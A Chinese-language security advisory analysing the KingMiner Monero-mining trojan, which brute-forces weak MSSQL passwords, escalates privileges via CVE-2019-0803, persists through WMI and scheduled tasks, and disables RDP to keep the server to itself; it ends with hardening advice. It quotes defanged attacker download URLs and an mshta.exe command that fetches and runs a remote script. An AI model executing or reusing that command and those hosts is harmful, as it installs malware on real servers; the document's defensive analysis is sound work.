安全预警：KingMiner矿工针对SQL弱口令的爆破攻击再度袭来

一、背景

KingMiner是一种针对Windows服务器MSSQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现，并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测，导致一些反病毒引擎无法准确检测。

当前版本KingMiner具有以下特点：

1. 针对MSSQL进行爆破攻击入侵；

2. 利用WMI定时器和Windows计划任务进行持久化攻击；

3. 关闭存在CVE-2019-0708漏洞机器上RDP服务防止其他挖矿团伙入侵，以独占已控制的服务器资源；

4. 使用base64和特定编码的XML，TXT，PNG文件来加密木马程序；

5. 利用微软和多个知名厂商的签名文件作为父进程，“白+黑”启动木马DLL。

二、详细分析

KingMiner在MSSQL爆破入侵成功后，首先执行一段VBS脚本(tl.txt/vk.txt)，检测操作系统版本，并根据不同的系统版本下载不同的Payload文件，利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本，执行服务器返回的恶意代码达到持久化攻击的目的。

KingMiner变种攻击流程

提权

vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件，经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe

tool.exe 利用Windows权限提升漏洞CVE-2019-0803进行攻击，成功利用此漏洞的攻击者可以在内核模式下运行任意代码，然后可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。

tool.exe在特权模式下执行命令mshta.exe vbscript:GetObject(\”script:http[:]//aa.30583fdae.tk/r1.txt\”)(window.close)，通过mshta.exe执行脚本r1.txt来进行持久化。

病毒会获取计算机版本并判断计算机版本是否受CVE-2019-0708漏洞的影响且计算机是否安装特定补丁(kb4499175 kb4500331 KB4499149 KB4499180 KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。

如果没有安装补丁，则修改设置禁止其他机器通过远程桌面服务访问本机，通过这种方式来阻止其他木马进入系统，从而达到独占挖矿资源的目的

三、安全建议

我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施：

1.根据微软官方公告修复特权提升漏洞CVE-2019-0803：

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803

2、加固SQL Server服务器，修补服务器安全漏洞。使用安全的密码策略，使用高强度密码，切勿继续使用弱口令，特别是sa账号密码，防止黑客暴力破解。

3、修改SQL Sever服务默认端口，在原始配置基础上更改默认1433端口设置，并且设置访问规则，拒绝1433端口探测。